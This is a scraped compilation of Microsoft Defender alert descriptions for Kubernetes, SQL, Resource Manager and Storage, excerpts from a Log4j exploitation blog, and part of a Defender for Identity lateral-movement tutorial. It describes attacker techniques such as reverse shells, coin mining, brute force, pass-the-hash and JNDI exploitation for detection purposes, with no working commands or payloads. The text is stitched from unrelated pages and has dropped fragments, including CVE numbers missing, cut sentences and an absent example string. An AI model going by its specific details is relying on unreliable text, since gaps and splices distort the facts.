The volume that was detected is a hostPath type which mounts a sensitive file or folder from the node to the container. If the container gets compromised, the attacker can use this mount for gaining access to the node. Kubernetes audit log analysis detected a modification of the CoreDNS configuration. The configuration of CoreDNS can be modified by overriding its configmap. Kubernetes audit log analysis detected a new admission webhook configuration. The behavior of these admission controllers is determined by an admission webhook that the user deploys to the cluster.
The usage of such admission controllers can be legitimate, however attackers can use such webhooks for modifying the requests in case of MutatingAdmissionWebhook or inspecting the requests and gain sensitive information in case of ValidatingAdmissionWebhook.
Detected file download from a known malicious source Preview K8S. Analysis of processes running within a container detected download of a file from a source frequently used to distribute malware. Analysis of processes running within a container detected installation of a startup script for single-user mode. It is extremely rare that any legitimate process needs to execute in that mode so it may indicate an attacker has added a malicious process to every run-level to guarantee persistence.
Detected suspicious file download Preview K8S. Detected suspicious use of the nohup command Preview K8S. Analysis of processes running within a container detected suspicious use of the nohup command. Attackers have been seen using the command nohup to run hidden files from a temporary directory to allow their executables to run in the background. It is rare to see this command run on hidden files located in a temporary directory.
Detected suspicious use of the useradd command Preview K8S. Analysis of processes running within a container detected suspicious use of the useradd command.
Kubernetes audit log analysis detected a container that has an image associated with a digital currency mining tool. Digital currency mining related behavior detected Preview K8S. Analysis of host data detected the execution of a process or command normally associated with digital currency mining. Docker build operation detected on a Kubernetes node Preview K8S. Analysis of processes running within a container indicates a build operation of a container image on a Kubernetes node.
Analysis of the Kubernetes audit logs detected an excessive permissions role assignment to your cluster. The listed permissions for the assigned roles are uncommon to the specific service account. This detection considers previous role assignments to the same service account across clusters monitored by Azure, volume per permission, and the impact of the specific permission.
The anomaly detection model used for this alert takes into account how this permission is used across all clusters monitored by Microsoft Defender for Cloud. Executable found running from a suspicious location Preview K8S. Analysis of host data detected an executable file that is running from a location associated with known suspicious files. The Kubernetes audit log analysis detected exposure of the Istio Ingress by a load balancer in a cluster that runs Kubeflow.
This action might expose the Kubeflow dashboard to the internet. If the dashboard is exposed to the internet, attackers can access it and run malicious containers or code on the cluster. Kubernetes audit log analysis detected exposure of the Kubernetes Dashboard by a LoadBalancer service. Exposed dashboard allows an unauthenticated access to the cluster management and poses a security threat. The Kubernetes audit log analysis detected exposure of a service by a load balancer.
This service is related to a sensitive application that allows high impact operations in the cluster such as running processes on the node or creating new containers. In some cases, this service doesn't require authentication. If the service doesn't require authentication, exposing it to the internet poses a security risk.
The Kubernetes audit log analysis detected exposure of a Redis service by a load balancer. Analysis of processes running within a container detected file names that are part of a toolkit associated with malware capable of launching DDoS attacks, opening ports and services, and taking full control over the infected system.
While this behavior can be legitimate, it's often seen in malicious activities, when attackers try to hide their source IP. Defender for Cloud detected that some Kubernetes events have been deleted.
Kubernetes events are objects in Kubernetes which contain information about changes in the cluster. Attackers might delete those events for hiding their operations in the cluster. Kubernetes audit log analysis detected usage of Kubernetes penetration testing tool in the AKS cluster. While this behavior can be legitimate, attackers might use such public tools for malicious purposes. Analysis of processes running within a container detected the execution of a command normally associated with common Linux bot reconnaissance.
Manipulation of host firewall detected Preview K8S. Analysis of processes running within a container detected possible manipulation of the on-host firewall.
Microsoft Defender for Cloud test alert not a threat. Preview K8S. Analysis of processes running within a container indicate that a suspicious process was running. This is often associated with the MITRE 54ndc47 agent which could be used maliciously to attack other machines. The kube-system namespaces should not contain user resources. Attackers can use this namespace for hiding malicious components. Kubernetes audit log analysis detected a new role with high privileges.
Unnecessary privileges might cause privilege escalation in the cluster. Analysis of processes running within a container indicates a suspicious tool ran. This tool is often associated with malicious users attacking others. Analysis of processes running within a container detected a suspicious file being downloaded and run.
Possible command line exploitation attempt Preview K8S. Analysis of processes running within a container detected a possible exploitation attempt against a known vulnerability. Possible credential access tool detected Preview K8S. Analysis of processes running within a container indicates a possible known credential access tool was running on the container, as identified by the specified process and commandline history item.
Possible Cryptocoinminer download detected Preview K8S. Analysis of processes running within a container detected the download of a file normally associated with digital currency mining. Possible data exfiltration detected Preview K8S. Analysis of processes running within a container detected possible removal of files that tracks user's activity during the course of its operation. Possible password change using crypt-method detected Preview K8S. Analysis of processes running within a container detected a password change using the crypt method.
Attackers can make this change to continue access and gain persistence after compromise. Potential overriding of common files Preview K8S.
Analysis of processes running within a container detected common files as a way to obfuscate their actions or for persistence. Analysis of processes running within a container detected the initiation of port forwarding to an external IP address.
Analysis of processes running within a container detected a potential reverse shell. Kubernetes audit log analysis detected a new privileged container. If compromised, an attacker can use the privileged container to gain access to the node. Process associated with digital currency mining detected Preview K8S. Analysis of processes running within a container detected the execution of a process normally associated with digital currency mining.
This access could signify that an actor is attempting to gain persistent access to a machine. Kubernetes audit log analysis detected a new binding to the cluster-admin role which gives administrator privileges. Unnecessary administrator privileges might cause privilege escalation in the cluster. Script extension mismatch detected Preview K8S. Analysis of processes running within a container detected a mismatch between the script interpreter and the extension of the script file provided as input.
Security-related process termination detected Preview K8S. Analysis of processes running within a container detected attempt to terminate processes related to security monitoring on the container. Attackers will often try to terminate such processes using predefined scripts post-compromise. Analysis of processes running within a container detected an SSH server running inside the container. Analysis of processes running within a container detected suspicious compilation.
Attackers will often compile exploits to escalate privileges. Suspicious file timestamp modification Preview K8S. Attackers will often copy timestamps from existing legitimate files to new tools to avoid detection of these newly dropped files. Analysis of processes running within a container indicates that a suspicious request was made to the Kubernetes API. The request was sent from a container in the cluster. Although this behavior can be intentional, it might indicate that a compromised container is running in the cluster.
Analysis of processes running within a container indicates that a suspicious request was made to the Kubernetes Dashboard. An application has generated a faulty SQL statement in the database. This can indicate a possible vulnerability to SQL injection attacks. There are two possible reasons for a faulty statement.
A defect in application code might have constructed the faulty SQL statement. Or, application code or stored procedures didn't sanitize user input when constructing the faulty SQL statement, which can be exploited for SQL injection.
Attempted logon by a potentially harmful application SQL. There has been a change in the access pattern to an SQL Server, where someone has signed in to the server from an unusual Azure Data Center.
In some cases, the alert detects a legitimate action a new application or Azure service. In other cases, the alert detects a malicious action attacker operating from breached resource in Azure.
Log on from an unusual location SQL. There has been a change in the access pattern to SQL Server, where someone has signed in to the server from an unusual geographical location. In some cases, the alert detects a legitimate action a new application or developer maintenance. In other cases, the alert detects a malicious action a former employee or external attacker. Login from a principal user not seen in 60 days SQL. A principal user not seen in the last 60 days has logged into your database.
If this database is new or this is expected behavior caused by recent changes in the users accessing the database, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives. Your resource has been accessed successfully from an IP address that Microsoft Threat Intelligence has associated with suspicious activity.
An abnormally high number of failed sign in attempts with different credentials have occurred. In some cases, the alert detects penetration testing in action. In other cases, the alert detects a brute force attack. An active exploit has occurred against an identified application vulnerable to SQL injection. This means an attacker is trying to inject malicious SQL statements by using the vulnerable application code or stored procedures. A potential brute force attack has been detected on your resource.
The attacker is using the valid user sa, which has permissions to login. Suspected successful brute force attack SQL. Suspected brute force attack using a valid user SQL.
The attacker is using the valid user username , which has permissions to login. Login from a domain not seen in 60 days SQL. A user has logged in to your resource from a domain no other users have connected from in the last 60 days. If this resource is new or this is expected behavior caused by recent changes in the users accessing the resource, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives.
Logon from an unusual cloud provider SQL. Someone logged on to your resource from a cloud provider not seen in the last 60 days.
It's quick and easy for threat actors to obtain disposable compute power for use in their campaigns. If this is expected behavior caused by the recent adoption of a new cloud provider, Defender for Cloud will learn over time and attempt to prevent future false positives.
Microsoft Defender for Resource Manager detected an operation from an IP address that has been marked as suspicious in threat intelligence feeds. Microsoft Defender for Resource Manager detected a resource management operation from an IP address that is associated with proxy services, such as TOR. While this behavior can be legitimate, it's often seen in malicious activities, when threat actors try to hide their source IP. MicroBurst's Information Gathering module was run on your subscription.
This tool can be used to discover resources, permissions and network structures. This was detected by analyzing the Azure Activity logs and resource management operations in your subscription.
MicroBurst's exploitation toolkit was used to execute code on your virtual machines. MicroBurst's exploitation toolkit was used to extract keys from your Azure key vaults. This was detected by analyzing Azure Activity logs and resource management operations in your subscription.
MicroBurst's exploitation toolkit was used to extract keys to your storage accounts. MicroBurst's exploitation toolkit was used to extract secrets from your Azure key vaults. This operation might have been performed by a legitimate user in your organization.
Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to grant permissions to an additional user account they own. This was detected by analyzing Azure Resource Manager operations in your tenant.
PowerZure exploitation toolkit was used to enumerate resources on behalf of a legitimate user account in your organization. PowerZure exploitation toolkit was used to enumerate storage shares, tables, and containers. PowerZure exploitation toolkit was used to execute a Runbook. PowerZure exploitation toolkit was used to extract Runbook content.
Users activity from an IP address that has been identified as an anonymous proxy IP address has been detected. These proxies are used by people who want to hide their device's IP address, and can be used for malicious intent. This detection uses a machine learning algorithm that reduces false positives, such as mis-tagged IP addresses that are widely used by users in the organization.
Requires an active Microsoft Defender for Cloud Apps license. Activity from a location that wasn't recently or ever visited by any user in the organization has occurred. This detection considers past activity locations to determine new and infrequent locations.
The anomaly detection engine stores information about previous locations used by users in the organization. A known cloud-environment reconnaissance toolkit run has been detected in your environment. The tool Azurite can be used by an attacker or penetration tester to map your subscriptions' resources and identify insecure configurations. Two user activities in a single or multiple sessions have occurred, originating from geographically distant locations.
This occurs within a time period shorter than the time it would have taken the user to travel from the first location to the second. This indicates that a different user is using the same credentials. This detection uses a machine learning algorithm that ignores obvious false positives contributing to the impossible travel conditions, such as VPNs and locations regularly used by other users in the organization.
The detection has an initial learning period of seven days, during which it learns a new user's activity pattern. Subscription activity logs analysis has detected suspicious behavior. A principal not in use for a long period of time is now performing actions that can secure persistence for an attacker.
A principal that doesn't regularly use PowerShell to manage the subscription environment is now using PowerShell, and performing actions that can secure persistence for an attacker. Analysis of your subscription activity logs has detected a suspicious behavior. A principal that doesn't regularly use the Azure portal Ibiza to manage the subscription environment hasn't used Azure portal to manage for the last 45 days, or a subscription that it is actively managing , is now using the Azure portal and performing actions that can secure persistence for an attacker.
Microsoft Defender for Resource Manager detected a suspicious creation of privileged custom role definition in your subscription. Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to create a privileged role to use in the future to evade detection.
Usage of MicroBurst exploitation toolkit to run an arbitrary code or exfiltrate Azure Automation account credentials. Usage of NetSPI persistence technique to create a webhook backdoor and maintain persistence in your Azure environment. PowerZure exploitation toolkit detected attempting to run code or exfiltrate Azure Automation account credentials.
PowerZure exploitation toolkit detected creating a webhook backdoor to maintain persistence in your Azure environment. Such traffic, while possibly benign, may indicate abuse of this common protocol to bypass network traffic filtering. Such activity, while possibly legitimate user behavior, is frequently employed by attackers to evade tracking and fingerprinting of network communications. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
Such activity, while possibly benign, is frequently performed by attackers to harvest credentials to remote services. Typical related attacker activity is likely to include the exploitation of any credentials on the legitimate service.
Such activity, while possibly benign, is frequently performed by attackers to evade network monitoring and filtering. Such activity, while possibly legitimate user behavior, is frequently performed by attackers following compromise of resources.
Typical related attacker activity is likely to include the download and execution of common mining tools. Such activity, while possibly legitimate user behavior, is frequently performed by attackers to evade network monitoring and filtering.
Access from a suspicious IP address Storage. Indicates that this storage account has been successfully accessed from an IP address that is considered suspicious. This alert is powered by Microsoft Threat Intelligence. Learn more about Microsoft's threat intelligence capabilities.
This URL was part of a phishing attack affecting users of Microsoft Typically, content hosted on such pages is designed to trick visitors into entering their corporate credentials or financial information into a web form that looks legitimate. Antimalware alerts indicate that an infected file s is stored in an Azure file share that is mounted to multiple VMs. If attackers gain access to a VM with a mounted Azure file share, they can use it to spread malware to other VMs that mount the same share.
Applies to: Azure Files. The access policy of a container in your storage account was modified to allow anonymous access.
This might lead to a data breach if the container holds any sensitive data. This alert is based on analysis of Azure activity log. Authenticated access from a Tor exit node Storage.
Threat actors use Tor to make it difficult to trace the activity back to them. Authenticated access from a Tor exit node is a likely indication that a threat actor is trying to hide their identity. Access from an unusual location to a storage account Storage. Indicates that there was a change in the access pattern to an Azure Storage account. Someone has accessed this account from an IP address considered unfamiliar when compared with recent activity. Either an attacker has gained access to the account, or a legitimate user has connected from a new or unusual geographic location.
An example of the latter is remote maintenance from a new application or developer. Unusual unauthenticated access to a storage container Storage. This storage account was accessed without authentication, which is a change in the common access pattern.
Read access to this container is usually authenticated. This might indicate that a threat actor was able to exploit public read access to storage container s in this storage account s.
Applies to: Azure Blob Storage. January 10, recap — The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment.
Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries like nation-state actors and commodity attackers alike have been observed taking advantage of these vulnerabilities.
There is high potential for the expanded use of the vulnerabilities. In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered.
At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.
January 11, update — We have just released new threat and vulnerability management capabilities, including providing the ability to turn off JNDI lookup directly on the Microsoft Defender portal. With nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible.
Refer to the Microsoft Security Response Center blog for technical information about the vulnerabilities and mitigation recommendations. Meanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats.
This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to 1 find and remediate vulnerable services and systems and 2 detect, investigate, and respond to attacks. The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.
An example pattern of attack would appear in a web request log with strings like the following:. An attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.
The specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. As security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives.
Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.
Minecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. Microsoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by Bitdefender.
In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.
In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of javaw.
These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use. Due to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.
In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. MSTIC and the Microsoft Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks.
These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.
The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload.
This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.
Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally. This activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE to existing campaigns that were exploiting vulnerabilities to drop remote access tools.
In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns. The Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities.
While services such as interact. As early as January 4, attackers started exploiting the CVE vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.
Based on our analysis, the attackers are using command and control CnC servers that spoof legitimate domains. These include service[. Threat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate. The threat and vulnerability management capabilities within Microsoft Defender can help identify vulnerable installations.
On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities—on the device, software, and vulnerable component level—through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server , , and They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version The updates include the following:.
To complement this new table, the existing DeviceTvmSoftwareVulnerabilities table in advanced hunting can be used to identify vulnerabilities in installed software on devices:. These new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.
Figure 1. Figure 2. Threat and vulnerability management dedicated CVE dashboard. Figure 3. Threat and vulnerability management finds exposed paths. Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk.
Note: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available. Through device discovery , unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.
Figure 5. Finding vulnerable applications and devices via software inventory. These new capabilities provide security teams with the following:. To use this feature, open the Exposed devices tab in the dedicated CVE dashboard and review the Mitigation status column. Feedback will be sent to Microsoft: By pressing the submit button, your feedback will be used to improve Microsoft products and services. Privacy policy.
Typically, cyberattacks are launched against any accessible entity, such as a low-privileged user, and then quickly move laterally until the attacker gains access to valuable assets. Valuable assets can be sensitive accounts, domain administrators, or highly sensitive data.
Microsoft Defender for Identity identifies these advanced threats at the source throughout the entire attack kill chain and classifies them into the following phases:. To learn more about how to understand the structure, and common components of all Defender for Identity security alerts, see Understanding security alerts.
The following security alerts help you identify and remediate Lateral Movement phase suspicious activities detected by Defender for Identity in your network. In this tutorial, you'll learn how to understand, classify, remediate, and prevent the following types of attacks:.
Adversaries might exploit the Windows Print Spooler service to perform privileged file operations in an improper manner. An attacker who has or obtains the ability to execute code on the target, and who successfully exploits the vulnerability, could run arbitrary code with SYSTEM privileges on a target system. If run against a domain controller, the attack would allow a compromised non-administrator account to perform actions against a domain controller as SYSTEM.
This functionally allows any attacker who enters the network to instantly elevate privileges to Domain Administrator, steal all domain credentials, and distribute further malware as a Domain Admin.
In this vulnerability, servers fail to properly handle requests. An attacker who successfully exploits the vulnerability can run arbitrary code in the context of the Local System Account.
Windows servers currently configured as DNS servers are at risk from this vulnerability. In this detection, a Defender for Identity security alert is triggered when DNS queries suspected of exploiting the CVE security vulnerability are made against a domain controller in the network.
Pass-the-Hash is a lateral movement technique in which attackers steal a user's NTLM hash from one computer and use it to gain access to another computer. Pass-the-Ticket is a lateral movement technique in which attackers steal a Kerberos ticket from one computer and use it to gain access to another computer by reusing the stolen ticket.
In this detection, a Kerberos ticket is seen used on two or more different computers. Successfully resolving IPs to computers in the organization is critical to identify pass-the-ticket attacks from one computer to another. Is the sensor not resolving one or more of the destination IP addresses? If a destination IP address is not resolved, it may indicate that the correct ports between sensor and devices are not open correctly. If the answer to any of the previous questions is yes , check if the source and destinations computers are the same.
0コメント